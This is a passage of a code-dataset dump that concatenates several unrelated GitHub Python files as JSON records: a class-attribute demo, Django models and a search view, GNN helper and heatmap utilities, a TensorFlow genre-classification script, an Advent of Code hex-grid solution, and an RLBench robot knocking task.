Person(object):\n # age为类属性\n age = 1\n\n def __init__(self, name):\n # name为实例属性\n self.name = name\n\n\ndef main():\n # 类名.类属性\n print(Person.age)\n xiaoming = Person(\"小明\")\n # 对象.类属性\n print(xiaoming.age)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lotapp/BaseCode","sub_path":"python/2.OOP/1Encapsulation/1.6.static_class.py","file_name":"1.6.static_class.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"14796031798","text":"from django.contrib.auth.models import User\nfrom django.db import models\nfrom django.db.models import signals\nfrom django.utils.translation import gettext as _\n\nimport juntagrico\nfrom juntagrico.config import Config\nfrom juntagrico.entity.jobs import Assignment, OneTimeJob, RecuringJob, Job\nfrom juntagrico.entity.member import Member, SubscriptionMembership\nfrom juntagrico.entity.share import Share\nfrom juntagrico.entity.subs import Subscription, SubscriptionPart\nfrom juntagrico.lifecycle.job import job_pre_save, handle_job_canceled, handle_job_time_changed\nfrom juntagrico.lifecycle.member import member_pre_save, member_post_save, handle_member_deactivated, \\\n handle_member_created\nfrom juntagrico.lifecycle.share import share_post_save, handle_share_created, share_pre_save\nfrom juntagrico.lifecycle.simplestate import handle_simple_deactivated, handle_simple_activated\nfrom juntagrico.lifecycle.sub import sub_pre_save, handle_sub_canceled, handle_sub_deactivated, handle_sub_activated, \\\n sub_post_save, handle_sub_created\nfrom juntagrico.lifecycle.submembership import sub_membership_pre_save\nfrom juntagrico.lifecycle.subpart import sub_part_pre_save\nfrom juntagrico.util.signals import register_entities_for_post_init_and_save\n\n\nclass SpecialRoles(models.Model):\n '''\n No instances should be created of this class it is just the place to create permissions\n like bookkeeper or operation group\n '''\n\n class Meta:\n permissions = (('is_operations_group', _('Benutzer ist in der BG')),\n ('is_book_keeper', _('Benutzer ist Buchhalter')),\n ('can_send_mails', _('Benutzer kann im System Emails versenden')),\n ('can_use_general_email', _('Benutzer kann General Email Adresse verwenden')),\n ('depot_list_notification',\n _('Benutzer wird bei {0}-Listen-Erstellung informiert').format(Config.vocabulary('depot'))),\n ('can_view_exports', _('Benutzer kann Exporte öffnen')),\n ('can_view_lists', _('Benutzer kann Listen öffnen')),)\n\n\n''' non lifecycle related signals '''\nsignals.pre_save.connect(Member.create, sender=Member)\nsignals.post_delete.connect(Member.post_delete, sender=Member)\nsignals.pre_save.connect(Assignment.pre_save, sender=Assignment)\n''' lifecycle signal handling'''\n''' job signal handling '''\nsignals.pre_save.connect(job_pre_save, sender=OneTimeJob)\nsignals.pre_save.connect(job_pre_save, sender=RecuringJob)\nsignals.pre_save.connect(job_pre_save, sender=Job)\njuntagrico.signals.job_canceled.connect(handle_job_canceled, sender=OneTimeJob)\njuntagrico.signals.job_canceled.connect(handle_job_canceled, sender=RecuringJob)\njuntagrico.signals.job_time_changed.connect(handle_job_time_changed, sender=OneTimeJob)\njuntagrico.signals.job_time_changed.connect(handle_job_time_changed, sender=RecuringJob)\n''' subscription signal handling '''\nsignals.pre_save.connect(sub_pre_save, sender=Subscription)\nsignals.post_save.connect(sub_post_save, sender=Subscription)\njuntagrico.signals.sub_created.connect(handle_sub_created, sender=Subscription)\njuntagrico.signals.sub_activated.connect(handle_sub_activated, sender=Subscription)\njuntagrico.signals.sub_deactivated.connect(handle_sub_deactivated, sender=Subscription)\njuntagrico.signals.sub_canceled.connect(handle_sub_canceled, sender=Subscription)\n''' subscription part handling'''\nsignals.pre_save.connect(sub_part_pre_save, sender=SubscriptionPart)\njuntagrico.signals.extra_sub_activated.connect(handle_simple_activated, sender=SubscriptionPart)\njuntagrico.signals.extra_sub_deactivated.connect(handle_simple_deactivated, sender=SubscriptionPart)\n''' subscription membership handling '''\nsignals.pre_save.connect(sub_membership_pre_save, sender=SubscriptionMembership)\n''' share handling '''\nsignals.pre_save.connect(share_pre_save, sender=Share)\nsignals.post_save.connect(share_post_save, sender=Share)\njuntagrico.signals.share_created.connect(handle_share_created, sender=Share)\n''' member handling '''\nsignals.pre_save.connect(member_pre_save, sender=Member)\nsignals.post_save.connect(member_post_save, sender=Member)\njuntagrico.signals.member_created.connect(handle_member_created, sender=Member)\njuntagrico.signals.member_deactivated.connect(handle_member_deactivated, sender=Member)\n''' lifecycle all post init'''\nregister_entities_for_post_init_and_save()\n\n'''monkey patch User email method'''\n\n\ndef member_email(self):\n return self.member.email\n\n\nUser.member__email = property(member_email)\n\nUser.EMAIL_FIELD = 'member__email'\n","repo_name":"juntagrico/juntagrico","sub_path":"juntagrico/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"61"} +{"seq_id":"6162923333","text":"from django.shortcuts import render , redirect\nfrom django.contrib.postgres.search import SearchVector, SearchQuery, SearchRank , TrigramSimilarity\nfrom django.views.generic import (ListView, DetailView, CreateView, UpdateView)\nfrom django.db.models import Q, F, Count, Subquery, Prefetch\nfrom itertools import chain\nfrom .models import SearchTerms\nfrom product.models import Product ,Category\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n\n\nclass SearchView(ListView):\n template_name = 'category.html'\n count = 0\n queryset = Product.objects.none()\n\n def get_context_data(self, *args, **kwargs):\n context = super().get_context_data(*args, **kwargs)\n # context['count'] = context.get('object_list').count()\n query = self.request.GET.get('q')\n show = self.request.GET.get('show')\n cat = self.request.GET.get('list')\n\n search_vectors = (\n SearchVector('title', weight='A') +\n SearchVector('description', weight='B')\n )\n\n search_query = SearchQuery(query)\n search_rank = SearchRank(search_vectors, search_query)\n trigram_similarity = TrigramSimilarity('title', query)\n\n if query:\n self.update_search_query(query) \n products= Product.objects.annotate(search=search_vectors, total_orders = Count('order_products')).filter(Q(search=search_query)).order_by('-total_orders')\n categories = Category.objects.filter(product_subsubcatgeory__in=products)[0:20]\n if cat:\n products= products.filter(Q(sub_subcategory__slug=cat))\n\n paginator = Paginator(products, 40) \n page = self.request.GET.get('page')\n try:\n products = paginator.page(page)\n except PageNotAnInteger:\n products = paginator.page(1)\n except EmptyPage:\n products = paginator.page(paginator.num_pages)\n \n context = {\n 'products': products,\n 'categories':categories,\n }\n\n return context\n\n def update_search_query(self, query):\n term, _ = SearchTerms.objects.get_or_create(\n defaults={'search_terms':query}, \n search_terms__iexact=query\n )\n term.total_searches += 1\n term.save() \n\n\n # def get_queryset(self, *args, **kwargs):\n # query = self.request.GET['q']\n # if not query:\n # return redirect('home')\n # self.update_search_query(query)\n # return Product.objects.filter(Q(title__icontains=query))\n # return super().get_queryset()\n\n \n \n\n\n\n\n\n \n\n","repo_name":"surajbhattrai/Chroma-Django-Ecommerce","sub_path":"search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"31442147354","text":"#!/usr/bin/env python \n# -*- coding: utf-8 -*-\n# @Time : 2020/8/8 15:14\n# @Author : Raymound luo\n# @Mail : luolinhao1998@gmail.com\n# @File : helper.py\n# @Software: PyCharm\n# @Describe:\nimport torch\nimport os\nimport matplotlib as mpl\n\nmpl.use('Agg')\nfrom matplotlib import pyplot as plt\nfrom .evluator import Evaluator\nimport json\nimport numpy as np\nimport matplotlib\n\n\ndef to_device(tensor_list, device):\n return [tensor.to(device) for tensor in tensor_list]\n\n\ndef get_logits(p_emb, contex_emb, pos_g, neg_g):\n pos_edges = pos_g.edges()\n neg_edges = neg_g.edges()\n src = torch.cat([pos_edges[0], neg_edges[0]])\n dst = torch.cat([pos_edges[1], neg_edges[1]])\n labels = torch.cat([torch.ones_like(pos_edges[0]), torch.zeros_like(neg_edges[1])]).float()\n logits = torch.sum((p_emb[src] * contex_emb[src]) * (p_emb[dst] * contex_emb[dst]), dim=1)\n return logits, labels\n\n\ndef load_latest_model(checkpoint_path, model):\n files = os.listdir(checkpoint_path)\n get_time = lambda file: os.path.getmtime(os.path.join(checkpoint_path, file))\n files.sort(key=get_time, reverse=True)\n try:\n latest_model_path = os.path.join(checkpoint_path, files[0])\n except:\n return model\n if os.path.isdir(latest_model_path):\n latest_model_path = os.path.join(latest_model_path, 'model.pth')\n print(\"Load model: \", latest_model_path)\n model.load_state_dict(torch.load(latest_model_path))\n return model\n\n\ndef evaluate(p_emb, CF_data, LP_data, method, metric=['CF', 'LP', 'CL'], save_result=False, result_path='./result',\n random_state=123, max_iter=150,\n n_jobs=1):\n evaluator = Evaluator(method, CF_data, LP_data, result_path, random_state, max_iter, n_jobs)\n if 'CF' in metric:\n evaluator.evluate_CF(p_emb)\n if 'LP' in metric:\n evaluator.evluate_LP(p_emb)\n if 'CL' in metric:\n evaluator.evluate_CL(p_emb)\n if save_result:\n return evaluator.dump_result(p_emb, metric)\n return None\n\n\ndef save_attention_matrix(model, path, K):\n attention_matrix_path = os.path.join(path, 'atten.json')\n loss_weight_softmax = torch.softmax(torch.exp(-model.loss_weight), dim=0).detach().cpu().numpy()\n np.savetxt(os.path.join(path, 'raw_length_attention.txt'), model.loss_weight.detach().cpu().numpy(), fmt='%.03f')\n np.savetxt(os.path.join(path, 'softmax_length_attention.txt'), loss_weight_softmax, fmt='%.03f')\n model.eval()\n with torch.no_grad():\n for k in range(1, K + 2):\n model(k)\n model.dump_cgnn_attention_matrix(attention_matrix_path)\n print(\"Attention matrix saved in {}\".format(attention_matrix_path))\n return attention_matrix_path\n\n\ndef heatmap(data, row_labels, col_labels, ax=None,\n cbar_kw={}, cbarlabel=\"\", **kwargs):\n \"\"\"\n Create a heatmap from a numpy array and two lists of labels.\n\n Parameters\n ----------\n data\n A 2D numpy array of shape (N, M).\n row_labels\n A list or array of length N with the labels for the rows.\n col_labels\n A list or array of length M with the labels for the columns.\n ax\n A `matplotlib.axes.Axes` instance to which the heatmap is plotted. If\n not provided, use current axes or create a new one. Optional.\n cbar_kw\n A dictionary with arguments to `matplotlib.Figure.colorbar`. Optional.\n cbarlabel\n The label for the colorbar. Optional.\n **kwargs\n All other arguments are forwarded to `imshow`.\n \"\"\"\n\n if not ax:\n ax = plt.gca()\n\n # Plot the heatmap\n im = ax.imshow(data, **kwargs)\n\n # Create colorbar\n cbar = ax.figure.colorbar(im, ax=ax, **cbar_kw)\n cbar.ax.set_ylabel(cbarlabel, rotation=-90, va=\"bottom\", fontsize=12)\n\n # We want to show all ticks...\n ax.set_xticks(np.arange(data.shape[1]))\n ax.set_yticks(np.arange(data.shape[0]))\n # ... and label them with the respective list entries.\n ax.set_xticklabels(col_labels, fontsize=18)\n ax.set_yticklabels(row_labels, fontsize=18)\n\n # Let the horizontal axes labeling appear on top.\n ax.tick_params(top=True, bottom=False,\n labeltop=True, labelbottom=False)\n\n # Rotate the tick labels and set their alignment.\n plt.setp(ax.get_xticklabels())\n\n # Turn spines off and create white grid.\n for edge, spine in ax.spines.items():\n spine.set_visible(False)\n\n ax.set_xticks(np.arange(data.shape[1] + 1) - .5, minor=True)\n ax.set_yticks(np.arange(data.shape[0] + 1) - .5, minor=True)\n ax.grid(which=\"minor\", color=\"w\", linestyle='-', linewidth=3)\n ax.tick_params(which=\"minor\", bottom=False, left=False)\n\n return im, cbar\n\n\ndef annotate_heatmap(im, data=None, valfmt=\"{x:.2f}\",\n textcolors=[\"black\", \"white\"],\n threshold=None, **textkw):\n \"\"\"\n A function to annotate a heatmap.\n\n Parameters\n ----------\n im\n The AxesImage to be labeled.\n data\n Data used to annotate. If None, the image's data is used. Optional.\n valfmt\n The format of the annotations inside the heatmap. This should either\n use the string format method, e.g. \"$ {x:.2f}\", or be a\n `matplotlib.ticker.Formatter`. Optional.\n textcolors\n A list or array of two color specifications. The first is used for\n values below a threshold, the second for those above. Optional.\n threshold\n Value in data units according to which the colors from textcolors are\n applied. If None (the default) uses the middle of the colormap as\n separation. Optional.\n **kwargs\n All other arguments are forwarded to each call to `text` used to create\n the text labels.\n \"\"\"\n\n if not isinstance(data, (list, np.ndarray)):\n data = im.get_array()\n\n # Normalize the threshold to the images color range.\n if threshold is not None:\n threshold = im.norm(threshold)\n else:\n threshold = im.norm(data.max()) / 2.\n\n # Set default alignment to center, but allow it to be\n # overwritten by textkw.\n kw = dict(horizontalalignment=\"center\",\n verticalalignment=\"center\")\n kw.update(textkw)\n\n # Get the formatter in case a string is supplied\n if isinstance(valfmt, str):\n valfmt = matplotlib.ticker.StrMethodFormatter(valfmt)\n\n # Loop over the data and create a `Text` for each \"pixel\".\n # Change the text's color depending on the data.\n texts = []\n for i in range(data.shape[0]):\n for j in range(data.shape[1]):\n kw.update(color=textcolors[int(im.norm(data[i, j]) > threshold)])\n text = im.axes.text(j, i, \"%.2f\" % data[i, j], **kw)\n texts.append(text)\n\n return texts\n\n\ndef generate_attention_heat_map(node_types, attention_matrix_path):\n with open(attention_matrix_path) as f:\n attention_matrix_dict = json.load(f)\n x_label = node_types\n y_label = node_types\n for hop, hop_attention_matrix in attention_matrix_dict.items():\n data = []\n for x in x_label:\n temp = []\n for y in y_label:\n key = x + y\n value = 0\n for _, head in hop_attention_matrix.items():\n value = value + head.get(key, 0) # Sum the value of each head\n temp.append(value)\n data.append(temp)\n fig, ax = plt.subplots()\n Y_label = [i.upper() for i in y_label]\n X_label = [i.upper() for i in x_label]\n data = np.array(data)\n im, _ = heatmap(data, Y_label, X_label, ax=ax, vmin=0,\n cmap=\"magma_r\",\n cbarlabel=\"Relation Attention Matrix of {} hop Context\".format(hop.split('_')[-1]))\n annotate_heatmap(im, valfmt=\"{x:d}\", size=15, threshold=20,\n textcolors=[\"red\", \"white\"])\n fig.tight_layout()\n figure_path = os.path.join(os.path.dirname(attention_matrix_path), \"{}-length.png\".format(hop.split('_')[-1]))\n plt.savefig(figure_path)\n # show\n plt.show()\n\n\ndef save_config(config, path):\n config_path = os.path.join(path, \"config.py\")\n with open(config_path, 'w') as f:\n f.write('data_config =' + str(config.data_config))\n f.write(\"\\n\")\n f.write('model_config =' + str(config.model_config))\n f.write(\"\\n\")\n f.write('train_config =' + str(config.train_config))\n f.write(\"\\n\")\n f.write('evaluate_config =' + str(config.evaluate_config))\n","repo_name":"RManLuo/CP-GNN","sub_path":"utils/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":8501,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"61"} +{"seq_id":"20055016766","text":"#from os import putenv\n#putenv(\"TF_CPP_MIN_LOG_LEVEL\", \"2\")\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras.layers.experimental import preprocessing\nfrom settings import *\nfrom data_processing import *\nfrom models import make_model\nfrom data_reading import read\n\n\nmodel_name = \"conv_zporadnika\"\n\nEPOCHS = 15\n# MODELS = [\"test\", \"recurrent1\", \"recurrent2\", \"convoulutional1\", \"conv_zporadnika\", \"PRCNN\", \"BBNN\", \"BBNN_simplified\"]\n# print('Wybierz model:')\n# for i in range(len(MODELS)):\n# print(f'{i+1}. {MODELS[i]}')\n# model_name = MODELS[int(input())-1]\n\n# split = 80 # % of data used for training (rest for validation)\n\ndataset, _shape = read(model_name, 20)\n#dataset.map(lambda data, label: (spectrogram(data), label)) # Looks like shallow copy issues\ndataset = dataset.shuffle(min(len(dataset), 4000))\nn_split = np.ceil(len(dataset) * 0.7) # 70% for training\ntraining_dset = dataset.take(n_split)\nvalidation_dset = dataset.skip(n_split)\nn_split = np.ceil(len(dataset) * 0.2) # 20% for validation, 10% for testing\ntest_dset = validation_dset.skip(n_split)\nvalidation_dset = validation_dset.take(n_split)\n\ntraining_dset.batch(BATCH_SIZE)\nvalidation_dset.batch(BATCH_SIZE)\ntest_dset.batch(BATCH_SIZE)\n\nlearn = True\nif learn:\n\n initial_learning_rate = 0.01\n lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(\n initial_learning_rate, decay_steps=20, decay_rate=0.96, staircase=True\n )\n\n checkpoint_cb = tf.keras.callbacks.ModelCheckpoint(\n f\"checkpoints/{model_name}.h5\", save_best_only=True, monitor='val_accuracy'\n )\n\n early_stopping_cb = tf.keras.callbacks.EarlyStopping(\n patience=10, restore_best_weights=True, monitor='val_accuracy'\n )\n\n model = make_model(_shape, model_name)\n\n tf.keras.utils.plot_model(model, model_name+\".png\") # Requires graphviz installed (in system)\n\n model.compile(\n optimizer=tf.keras.optimizers.Adam(learning_rate=lr_schedule),\n loss=tf.keras.losses.CategoricalCrossentropy(from_logits=False),\n metrics=[tf.keras.metrics.CategoricalAccuracy()],\n run_eagerly=True\n )\n\n history = model.fit(\n training_dset,\n epochs=EPOCHS,\n validation_data=validation_dset,\n callbacks=[checkpoint_cb, early_stopping_cb],\n )\n\nelse:\n model = tf.keras.models.load_model(f\"checkpoints/{model_name}.h5\")\n\n\nmodel.evaluate(test_dset, steps=test_dset.__len__().numpy()/10, batch_size=10)\n\nlabels_original = np.concatenate([y for x, y in test_dset], axis=0)\nlabels_numeric = list()\nfor l in labels_original:\n idx = np.where(l == 1)[0][0]\n labels_numeric.append(idx)\n\npredictions = model.predict(np.concatenate([x for x, y in test_dset], axis=0), batch_size=BATCH_SIZE)\n\n#predictions = model.apply(np.concatenate([x for x, y in test_dset], axis=0))\n#predictions = model(np.concatenate([x for x, y in test_dset], axis=0))\n#model.evaluate(np.concatenate([x for x, y in test_dset], axis=0), steps=test_dset.__len__().numpy()/10, batch_size=10)\n# model.evaluate(np.concatenate([x for x, y in validation_dset], axis=0), steps=validation_dset.__len__().numpy()/10, batch_size=10)\n\npredictions_numeric = list()\nfor p in predictions:\n idx = np.argmax(p)\n predictions_numeric.append(idx)\ncounter = 0\n\nfor i in range(len(labels_numeric)):\n if labels_numeric[i] == predictions_numeric[i]:\n counter += 1\n\nprint(counter/len(labels_numeric))\n\ncm = tf.math.confusion_matrix(labels_numeric, predictions_numeric)\n\nprint(cm)\nprint(genres)\n\nwith open(f'confusion_matrixes/{model_name}_{counter/len(labels_numeric)}', 'w') as f:\n f.write(str(cm))\n\n# print(tf.keras.metrics.binary_accuracy(labels_numeric, predictions_numeric))\n\ncon = tf.math.confusion_matrix(labels=labels_numeric, predictions=predictions_numeric )\n\n#https://towardsdatascience.com/a-practical-guide-to-tfrecords-584536bc786c\nexit(0)\n","repo_name":"Maciej-R/Music_genre_recognition","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38535698749","text":"#!/usr/bin/env python\n# vim:set fileencoding=utf8: #\n\n\"\"\"\n +\n nw / \\ ne\n + q r +\n w| |e\n + +\n sw \\ / se\n +\n\ne, se, sw, w, nw, and ne\n\nne: +q, -r\n e: +q\nse: +r\nsw: -q, +r\n w: -q\nnw: -r\n\"\"\"\n\nimport sys\n\npuzzle_input = sys.stdin.read().strip()\n\ntiles = {}\n\ndef get_blacks():\n return [k for k,v in tiles.items() if v == 'black']\n\nfor line in puzzle_input.split('\\n'):\n coordinates = [0, 0]\n # Follow the coordinates to find the tile that gets flipped.\n i = 0\n while i < len(line):\n # First see if the next letter needs to be grabbed as well.\n c = line[i]\n i += 1\n if c in ['n', 's']:\n c += line[i]\n i += 1\n\n if c == 'ne':\n coordinates[0] += 1\n coordinates[1] -= 1\n elif c == 'e':\n coordinates[0] += 1\n elif c == 'se':\n coordinates[1] += 1\n elif c == 'sw':\n coordinates[0] -= 1\n coordinates[1] += 1\n elif c == 'w':\n coordinates[0] -= 1\n elif c == 'nw':\n coordinates[1] -= 1\n\n # At the destination tile. See if it's in the tile dictionary already.\n key = tuple(coordinates)\n if key not in tiles:\n tiles[key] = 'black'\n else:\n if tiles[key] == 'black':\n tiles[key] = 'white'\n else:\n tile[key] = 'black'\n\nprint('Part 1 Answer: {}'.format((len(get_blacks()))))\n\ndef get_adjacent_colors(q, r):\n adjacent = []\n for i,j in [[1, -1], [1, 0], [0,1], [-1, 1], [-1, 0], [0,-1]]:\n if (q+i, r+j) in tiles:\n adjacent.append(tiles[q+i, r+j])\n else:\n adjacent.append('white')\n\n return adjacent\n\ndef get_adjacent_whites(q, r):\n adjacent = []\n for i,j in [[1, -1], [1, 0], [0,1], [-1, 1], [-1, 0], [0,-1]]:\n if (q+i, r+j) in tiles:\n if tiles[q+i, r+j] == 'white':\n adjacent.append([q+i, r+j])\n else:\n adjacent.append([q+i, r+j])\n return adjacent\n\ndef process_day(day):\n\n new_tiles = dict(tiles)\n # Get location of all the black tiles.\n black_tiles = get_blacks()\n\n # First process rules for the black tiles.\n for l in black_tiles:\n adjacent_colors = get_adjacent_colors(l[0], l[1])\n num_blacks = len([x for x in adjacent_colors if x == 'black'])\n if num_blacks == 0 or num_blacks > 2:\n new_tiles[tuple(l)] = 'white'\n\n # Get the white tiles adjacent to this black tile.\n white_tile_locations = get_adjacent_whites(l[0], l[1])\n for w in white_tile_locations:\n # For each white tile, see if it has exactly two black adjacent.\n adjacent_colors = get_adjacent_colors(w[0], w[1])\n if len([x for x in adjacent_colors if x == 'black']) == 2:\n new_tiles[tuple(w)] = 'black'\n\n return new_tiles\n\nfor x in range(100):\n tiles = process_day(x)\n\nprint('Part 2 Answer: {}'.format(len(get_blacks())))\n","repo_name":"mhaig/adventofcode","sub_path":"2020/day24/day24.py","file_name":"day24.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44418871","text":"from typing import List, Tuple, Union\nimport numpy as np\nfrom pyrep.objects.proximity_sensor import ProximitySensor\nfrom rlbench.const import colors\nfrom rlbench.backend.spawn_boundary import SpawnBoundary\nfrom rlbench.backend.conditions import DetectedCondition, Condition\nfrom pyrep.objects.dummy import Dummy\nfrom pyrep.objects.object import Object\nfrom rlbench.backend.task import Task\nfrom pyrep.objects.shape import Shape\nfrom playsound import playsound\nimport os\n\n\nDESTINATION = \"waypoint1\"\nFULL_COLORS = (\"red\", \"green\", \"blue\", \"yellow\", \"purple\", \"orange\")\nCOLOR_MAPS = {}\nfor color_name, color_rgb in colors:\n COLOR_MAPS[color_name] = color_rgb\nSOUND_PATH = \"/informatik3/wtm/home/zhao/Codes/material_sounds/\"\n# e.g. + \"/train/ceramic/Clip_1.wav\"\n\nMATERIALS = [\n (\n \"metal\",\n (\"yellow\", \"orange\"),\n (\"hard and cold\", \"rigid, cold, and smooth\"),\n (\"heavy\", \"300g\"),\n ),\n (\n \"glass\",\n (\"red\", \"blue\", \"yellow\", \"green\"),\n (\"hard\", \"hard and smooth\", \"cold and smooth\"),\n (\"a little bit heavy\", \"150g\"),\n ),\n (\n \"ceramic\",\n FULL_COLORS,\n (\"hard\", \"tough\"),\n (\"100g\", \"average weight\", \"not too light nor not too heavy\"),\n ),\n (\"plastic\", FULL_COLORS, (\"hard\", \"soft\"), (\"light\", \"30g\")),\n (\n \"fibre\",\n FULL_COLORS,\n (\"soft\", \"flexible\"),\n (\"lightweight\", \"underweight\", \"10g\"),\n ),\n]\n\n\nshapes = (\"block\", \"cylinder\")\n\n\nclass NotInCondition(Condition):\n def __init__(self, obj: Object, boundary: Shape):\n self.obj = obj\n self.boundary = boundary\n\n def condition_met(self):\n # Only consider x, y (not z)\n N_only_consider = 2\n pos = self.obj.get_position()[:N_only_consider]\n bbox_pos = self.boundary.get_position()[:N_only_consider]\n bbox = self.boundary.get_bounding_box()[: 2 * N_only_consider]\n bbox_min = bbox_pos + bbox[::2]\n bbox_max = bbox_pos + bbox[1::2]\n met = np.any(pos < bbox_min) or np.any(pos > bbox_max)\n return met, False\n\n\nclass ReverseDetectedCondition(DetectedCondition):\n def condition_met(self):\n met, _ = super().condition_met()\n return not met, False\n\n\nclass ExtendedShape(Shape):\n def __init__(self, name_or_handle: Union[str, int]):\n super().__init__(name_or_handle)\n self._color_name = None\n self._material_name = None\n self._material_sound = None\n\n def set_color_name(self, color_name):\n self._color_name = color_name\n\n def get_color_name(self):\n return self._color_name\n\n def set_material_name(self, material_name):\n self._material_name = material_name\n\n def get_material_name(self):\n return self._material_name\n\n def set_material_sound(self, material_sound):\n self._material_sound = material_sound\n\n def get_material_sound(self):\n return self._material_sound\n\n def set_touch_data(self, touch_data):\n self._touch_data = touch_data\n\n def get_touch_data(self):\n return self._touch_data\n\n def set_weight(self, weight):\n self._weight = weight\n\n def get_weight(self):\n return self._weight\n\n\nclass Knocking(Task):\n def init_task(self) -> None:\n self._mode = \"train\"\n self._random = True\n self._records = []\n\n self.r_palm = Shape(\"r_palm\")\n self.r_Tbumper = Shape(\"r_Tbumper_respondable\")\n self.r_Ibumper = Shape(\"r_Ibumper_respondable\")\n self.r_Mbumper = Shape(\"r_Mbumper_respondable\")\n self.r_Rbumper = Shape(\"r_Rbumper_respondable\")\n self.r_Lbumper = Shape(\"r_Lbumper_respondable\")\n self.Container = Shape(\"Container\")\n\n self.target = ExtendedShape(\"Target\")\n self.distractors = [ExtendedShape(f\"Distractor{i}\") for i in range(2)]\n self.objs = [*self.distractors, self.target]\n self.register_graspable_objects(self.objs)\n self.frame = 0\n self.last_play_frame = 0\n\n # to normalize action\n # self.boundary = BoundaryObject(Shape('Boundary'))\n\n success_sensor = ProximitySensor(\"success\")\n self.register_success_conditions(\n [DetectedCondition(self.target, success_sensor)]\n )\n self.boundary = Shape(\"Boundary\")\n self.register_fail_conditions(\n [\n NotInCondition(self.target, self.boundary),\n ReverseDetectedCondition(self.target, success_sensor),\n ]\n )\n\n def init_episode(self, index: int) -> List[str]:\n def set_material_color_touch(\n obj: ExtendedShape,\n sample_color_name,\n sample_touch_data,\n sample_weight,\n material_name,\n log=True,\n ):\n sample_color_rgb = COLOR_MAPS[sample_color_name]\n material_sound_dir = SOUND_PATH + f\"{material_name}/{self._mode}\"\n if os.path.exists(material_sound_dir):\n material_sounds = [\n f for f in os.listdir(material_sound_dir) if f.endswith(\".wav\")\n ]\n\n material_sound = (\n material_sound_dir + \"/\" + np.random.choice(material_sounds)\n )\n else:\n material_sound = \"None\"\n obj.set_color(sample_color_rgb)\n obj.set_color_name(sample_color_name)\n obj.set_material_name(material_name)\n obj.set_material_sound(material_sound)\n obj.set_touch_data(sample_touch_data)\n obj.set_weight(sample_weight)\n log and print(\n f\"{obj.get_name()}: {sample_color_name}, {sample_touch_data}, {sample_weight}, {material_name} ({material_sound}).\"\n )\n return\n\n def sample_material_color(\n obj: ExtendedShape, material_index, sample_color_index=None, log=True\n ):\n (\n material_name,\n material_colors,\n material_touchs,\n material_weights,\n ) = MATERIALS[material_index]\n if sample_color_index is None:\n sample_color_index = np.random.choice(len(material_colors))\n sample_touch_index = np.random.choice(len(material_touchs))\n sample_weight_index = np.random.choice(len(material_weights))\n sample_color_name = material_colors[sample_color_index]\n sample_touch_data = material_touchs[sample_touch_index]\n sample_weight = material_weights[sample_weight_index]\n set_material_color_touch(\n obj,\n sample_color_name,\n sample_touch_data,\n sample_weight,\n material_name,\n log,\n )\n\n if self.random:\n sample_material_color(self.target, index)\n # It is OK to use the same color but different material\n distractor_material_indices = np.random.choice(\n list(range(index)) + list(range(index + 1, len(MATERIALS))),\n size=len(self.distractors),\n replace=True,\n )\n for distractor, distractor_material_index in zip(\n self.distractors, distractor_material_indices\n ):\n sample_material_color(distractor, distractor_material_index)\n\n b = SpawnBoundary([self.boundary])\n for ob in [self.target, *self.distractors]:\n b.sample(\n ob,\n min_distance=0.15,\n min_rotation=(0, 0, -3.14 / 4),\n max_rotation=(0, 0, 3.14 / 4),\n )\n else:\n sample_material_color(self.target, material_index=0, sample_color_index=0)\n sample_material_color(\n self.distractors[0], material_index=1, sample_color_index=0\n )\n sample_material_color(\n self.distractors[1], material_index=0, sample_color_index=2\n )\n # shapes[0] is =block=, only one shape for now.\n self.frame = 0\n self.last_play_frame = 0\n return [f\"pick up the {self.target.get_material_name()} {shapes[0]}\"]\n\n def is_static_workspace(self) -> bool:\n return True\n\n def variation_count(self) -> int:\n # TODO: The number of variations for this task.\n return len(MATERIALS)\n\n def step(self) -> None:\n self.last_play_frame\n self.frame += 1\n # Called during each sim step. Remove this if not using.\n for obj in self.objs:\n if obj.check_collision(self.r_palm) or obj.check_collision(self.Container):\n # TODO:\n # - [X] Play sound in background\n # - [ ] Only play sound when intentionally knock on objects\n # For testing\n obj_sound = obj.get_material_sound()\n # Avoid play repeated sound too soon.\n if (\n obj_sound is not None\n and obj_sound != \"None\"\n and self.frame - self.last_play_frame > 20\n ):\n print(f\"=====>>>> Playing {obj_sound}\")\n playsound(obj_sound, block=False)\n self.last_play_frame = self.frame\n self.record(obj_sound)\n\n if (\n obj.check_collision(self.r_Tbumper)\n or obj.check_collision(self.r_Ibumper)\n or obj.check_collision(self.r_Mbumper)\n or obj.check_collision(self.r_Rbumper)\n or obj.check_collision(self.r_Lbumper)\n ):\n obj_touch = obj.get_touch_data()\n self.touch(obj_touch)\n\n obj_weight = obj.get_weight()\n self.weigh(obj_weight)\n # print(f\"=====>>>> Feeling {obj_touch}\")\n # print(f\"=====>>>> Weighing {obj_weight}\")\n\n def set_mode(self, mode):\n self._mode = mode\n\n def set_random(self, random):\n self._random = random\n\n @property\n def random(self):\n return self._random\n\n @property\n def mode(self):\n return self._mode\n\n @property\n def records(self):\n return self._records\n\n def record(self, sound):\n self._records.append(sound)\n\n def clear_records(self):\n self._records = []\n\n @property\n def touchs(self):\n return self._touchs\n\n def touch(self, touch_data):\n self._touchs.append(touch_data)\n\n def clear_touchs(self):\n self._touchs = []\n\n @property\n def weights(self):\n return self._weights\n\n def weigh(self, weight):\n self._weights.append(weight)\n\n def clear_weights(self):\n self._weights = []\n\n def cleanup(self) -> None:\n # Called during at the end of each episode. Remove this if not using.\n self.clear_records()\n self.clear_touchs()\n 